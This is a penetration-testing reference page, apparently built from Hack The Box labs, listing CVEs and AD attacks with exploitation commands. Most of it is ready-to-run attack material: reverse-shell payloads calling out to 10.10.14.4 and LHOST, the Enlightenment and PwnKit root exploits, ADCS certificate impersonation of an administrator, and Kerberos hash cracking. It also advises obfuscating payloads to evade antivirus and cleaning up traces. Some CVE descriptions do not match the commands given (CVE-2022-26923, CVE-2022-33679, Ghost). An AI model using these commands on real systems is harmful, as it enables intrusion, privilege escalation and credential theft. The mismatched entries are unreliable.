Back to All Modules

Known CVE Exploitation

#Overview

This reference catalogs common CVEs encountered during penetration testing and their exploitation workflows. Each entry covers the vulnerability, detection method, exploitation steps with real commands, and compilation considerations. The focus is on CVEs that appear frequently in lab environments and assessments: CMS exploits, privilege escalation vectors, and Active Directory misconfigurations.

#CVE Exploitation Workflow

#1. Version Detection

# Web technologies
whatweb <URL>                                          # Technology fingerprint
curl -s <URL> | grep -i "version\|generator"            # HTML meta tags
curl -s <URL>/CHANGELOG.txt                             # Version disclosure files
curl -s <URL>/README.md

# Service versions
nmap -sV -p <port> <IP>                                 # Service version detection
nc <IP> <port>                                          # Banner grab
BASH

#2. PoC Search

searchsploit <software> <version>                       # Local Exploit-DB search
searchsploit -m <EDB-ID>                                # Mirror exploit to disk
# GitHub: search for "CVE-XXXX-XXXXX poc"
BASH

#3. Compilation Considerations

# Linux: gcc with static linking for older kernels
gcc exploit.c -o exploit -static -pthread               # Static linking avoids glibc mismatch
i686-w64-mingw32-gcc exploit.c -o exploit.exe -static   # Cross-compile for Windows

# .NET: compile with Visual Studio or mcs
mcs -out:exploit.exe exploit.cs                         # Mono C# compiler

# Python: ensure correct version with venv
python3 -m venv env && source env/bin/activate && pip install -r requirements.txt
BASH

#CVE-2023-30253 -- Dolibarr PHP Command Injection

#Detection

Check version in /README.md or login page footer. Authenticated access is required.

#Exploitation

# PoC: exploit-db ID 51536
python3 exploit.py -t http://target.com -u admin -p password -c 'bash -c "bash -i >& /dev/tcp/10.10.14.4/4444 0>&1"'
BASH

#CVE-2024-23897 -- Jenkins CLI Arbitrary File Read

#Detection

Jenkins typically runs on ports 8080 or 50000. The CLI interface on port 50000 is required for exploitation.

#Exploitation

# Download jenkins-cli.jar
wget http://<IP>:8080/jnlpJars/jenkins-cli.jar

# Read arbitrary file
java -jar jenkins-cli.jar -s http://<IP>:8080/ connect-node @"C:\users\administrator\secret\flag.txt"
java -jar jenkins-cli.jar -s http://<IP>:8080/ who-am-i @"C:\Windows\win.ini"

# Exploit command (if PoC available)
python3 CVE-2024-23897.py -u http://<IP>:8080 -f "/etc/passwd"
BASH

Note: This CVE was widely featured in Jenkins-based HTB machines.

#CVE-2023-40028 -- Ghost CMS Path Traversal

#Detection

Ghost CMS has a distinctive admin panel at /ghost/. Version may be disclosed in HTTP headers or source code.

#Exploitation

# Read arbitrary files
curl -s "http://<IP>/ghost/api/v3/admin/db" -H "Authorization: Ghost <valid_session>"
# Path traversal in image upload functionality
BASH

#CVE-2022-37706 -- Enlightenment 0.25.3 SUID Privilege Escalation

#Detection

find / -perm -u=s -type f 2>/dev/null | grep enlightenment
dpkg -l | grep enlightenment
enlightenment_version                              # If binary is on PATH
BASH

#Exploitation

# enlightenment_sys is SUID and vulnerable on Enlightenment <= 0.25.3
# PoC at: https://github.com/MaherAzzouzi/CVE-2022-37706-LPE-exploit
mkdir -p /tmp/net
mkdir -p "/dev/../tmp/;/tmp/exploit"

echo "/bin/sh" > /tmp/exploit
chmod +x /tmp/exploit
echo -n "/tmp/exploit" > /tmp/net/exploit

/usr/bin/enlightenment_sys /bin/mount -o noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u), "/dev/../tmp/;/tmp/exploit" /tmp///net
BASH

#Apache ActiveMQ -- CVE-2023-46604 (RCE)

#Detection

nmap -p 61616 --script activemq-info <IP>
curl -s http://<IP>:8161/admin/                     # Check web admin (default: admin/admin)
BASH

#Exploitation

The OpenWire protocol deserializes untrusted data. Public PoCs exist that trigger RCE by sending crafted packets to port 61616:

# Metasploit module
use exploit/multi/misc/apache_activemq_rce_cve_2023_46604
set RHOSTS <IP>
set LHOST <LHOST>
run

# Standalone PoC
python3 CVE-2023-46604.py -t <IP> -p 61616 -c "bash -i >& /dev/tcp/LHOST/LPORT 0>&1"
BASH

#Nagios XI -- CVE-2021-37343 (Authenticated RCE)

#Detection

Nagios XI runs on ports 80/443. Default credentials: nagiosadmin/nagiosadmin.

#Exploitation

Authenticated users can trigger RCE through configuration upload:

# Metasploit
use exploit/linux/http/nagios_xi_autodiscovery_webshell
set RHOSTS <IP>
set USERNAME nagiosadmin
set PASSWORD nagiosadmin
set LHOST <LHOST>
run
BASH

#NSClient++ 0.5.2.35 -- Authenticated RCE

#Detection

NSClient++ runs on port 8443 (HTTPS) with a self-signed certificate. Default password: nsclient.

#Exploitation

Authenticated access to the web interface allows enabling external scripts:

# Enable external scripts module via web interface
# Upload nc.exe and schedule check
# Or use Metasploit:
use exploit/windows/http/nsclient_authenticated_rce
set RHOSTS <IP>
set PASSWORD nsclient
set LHOST <LHOST>
run
BASH

#CVE-2021-4034 -- PwnKit (pkexec LPE)

#Detection

pkexec --version                                       # Check if pkexec exists (usually /usr/bin/pkexec)
which pkexec
dpkg -l | grep policykit-1                            # Check policykit version
BASH

#Exploitation

Affects most Linux distributions (Ubuntu, Debian, CentOS, RHEL). Works when polkit is installed (default on desktop distros):

# PoC compilation
git clone https://github.com/berdav/CVE-2021-4034
cd CVE-2021-4034
gcc cve-2021-4034-poc.c -o pwnkit
./pwnkit                                              # Spawns root shell
BASH

Alternative: Precompiled PoCs exist. Check searchsploit polkit.

#CVE-2019-1388 -- UAC Bypass via Certificate Dialog

#Detection

Windows versions: Windows 7 through Windows 10 (pre-patch), Server 2008 R2 through Server 2019.

#Exploitation

Requires GUI access (RDP or interactive session). Exploits the certificate dialog to spawn an elevated command prompt from a trusted Microsoft binary:

# 1. Right-click hhupd.exe (or any auto-elevating signed binary) -> Properties -> Digital Signatures -> Details -> View Certificate
# 2. In the "General" tab, click "Issuer Statement" link -> opens in browser
# 3. Save the page, then use "Save As" to spawn explorer.exe as SYSTEM
# 4. From the SYSTEM explorer, launch cmd.exe
# Detailed guide: https://github.com/jas502n/CVE-2019-1388
BASH

#CVE-2022-26923 -- ADCS ESC8 / Certifried

#Detection

Check if a Certificate Authority with web enrollment is present:

certipy-ad find -u '<user>' -p '<pass>' -dc-ip <DC_IP> -vulnerable
BASH

Look for ESC8 in output.

#Exploitation

NTLM relay to HTTP web enrollment endpoint to obtain a certificate for a Domain Controller machine account:

certipy-ad relay -ca <CA_IP> -template DomainController
BASH

#CVE-2022-33679 -- Kerberos RC4-MD4 Downgrade

#Detection

Check target OS version and patch level. Windows Server 2019/2022 without specific KB.

#Exploitation

Enables ASREPRoasting attacks against service accounts with Kerberos pre-authentication not strictly required:

impacket-GetNPUsers <domain>/ -usersfile users.txt -dc-ip <DC_IP> -request
BASH

#ESC1 -- Certificate Template Misconfiguration

#Detection

certipy-ad find -u '<user>@<domain>' -p '<pass>' -dc-ip <DC_IP> -vulnerable -enabled -stdout
# Look for: ENROLLEE_SUPPLIES_OBJECT flag + Authenticated Users enrollment
BASH

Alternative: Use Certify from Windows target:

.\Certify.exe find /vulnerable
POWERSHELL

#Exploitation

Request a certificate as any user (including Domain Admin) by specifying an arbitrary UPN in the Subject Alternative Name:

certipy-ad req -u '<user>@<domain>' -p '<pass>' -upn administrator@<domain> -target <CA_IP> -ca '<CA_NAME>' -template '<template_name>'

# Synchronize clock before Kerberos interaction
sudo ntpdate -u <DC_IP>

# Authenticate with certificate
certipy-ad auth -pfx administrator.pfx
BASH

Then use the extracted NTLM hash for PTH via evil-winrm or psexec.

#ESC16 -- Security Extension Disabled

#Detection

certipy reports "ESC16: Security Extension is disabled" in CA configuration.

#Exploitation

When the CA does not include the szOID_NTDS_CA_SECURITY_EXT extension, the object SID is not embedded in the certificate, allowing attacker to impersonate any user:

# Change target account's UPN to administrator
certipy-ad account update -username "<user>@<domain>" -p "<pass>" -user <target_account> -upn 'administrator'

# Request certificate using the modified UPN
certipy-ad req -u '<target_account>' -hashes <hash> -dc-ip '<DC_IP>' -target '<FQDN>' -ca '<CA_NAME>' -template 'User'

# Restore original UPN
certipy-ad account update -username "<user>@<domain>" -p "<pass>" -user <target_account> -upn '<original_upn>'

# Authenticate
certipy-ad auth -pfx administrator.pfx -domain '<domain>' -dc-ip <DC_IP>
BASH

#ASREPRoasting Workflow

#Detection

impacket-GetNPUsers <domain>/ -usersfile users.txt -dc-ip <DC_IP> -request
# Users with "Kerberos pre-authentication not required" (UF_DONT_REQUIRE_PREAUTH)
BASH

#Exploitation

# Loop through users
while read p; do impacket-GetNPUsers egotistical-bank.local/"$p" -request -no-pass -dc-ip <DC_IP> >> hash.txt; done < unames.txt

# Crack
hashcat -m 18200 hash.txt /usr/share/wordlists/rockyou.txt --force
john hash --format=krb5asrep --wordlist=/usr/share/wordlists/rockyou.txt
BASH

#Kerberoasting Workflow

#Detection

impacket-GetUserSPNs <domain>/<user>:<pass> -dc-ip <DC_IP> -request
BASH

#Exploitation

hashcat -m 13100 spn_hash.txt /usr/share/wordlists/rockyou.txt
BASH

#Git Repository Exposure

#Detection

curl -s http://<IP>/.git/HEAD
curl -s http://<IP>/.git/config
git-dumper http://<IP>/.git/ output_dir/
BASH

#Exploitation

Exposed .git directories reveal source code, configuration files with credentials, and commit history with sensitive data.

#Common Pitfalls

  • Warning: PoCs from GitHub may require modification (LHOST, LPORT, target paths) -- always review the source before running
  • Warning: Cross-compiling for older systems requires static linking or matching glibc -- use -static flag when in doubt
  • Warning: Metasploit payloads are often detected by AV -- consider using custom payloads or obfuscation
  • Warning: Time synchronization is critical for Kerberos-based exploits -- sudo ntpdate -u <DC_IP> before any ticket operations

#OPSEC Considerations

  • Shield: PoC execution may leave artifacts (compiled binaries, temp files, core dumps) -- clean up after exploitation
  • Shield: Reverse shell callbacks to public IPs may be blocked or alerting -- prefer C2 frameworks with redirectors
  • Shield: Multiple failed Kerberos TGT requests may trigger anomaly detection

#Post-Exploitation Value

  • Each CVE typically provides code execution (RCE) or file read leading to credential theft
  • Privilege escalation CVEs (PwnKit, UAC bypass) directly yield SYSTEM or root
  • ADCS ESC vulnerabilities provide path to Domain Admin compromise

#Cross-References

#Tool References

ToolLink
searchsploitBuilt-in (Kali)
certipy-adhttps://github.com/ly4k/Certipy
Certifyhttps://github.com/GhostPack/Certify
impackethttps://github.com/fortra/impacket
hashcathttps://hashcat.net/hashcat/

#Source Machines

  • Cerberus (Hard, Linux) - CVE-2022-37706 (Enlightenment LPE)
  • Sauna (Easy, AD) - ASREPRoasting + DCSync
  • Forest (Easy, AD) - ASREPRoasting svc-alfresco
  • Blackfield (Hard, AD) - ASREPRoasting support
  • Escape (Medium, AD) - ESC1 Certificate Template exploitation
  • Fluffy (Easy, AD) - ESC16 exploitation
  • Jeeves (Medium, Windows) - Jenkins unauthenticated access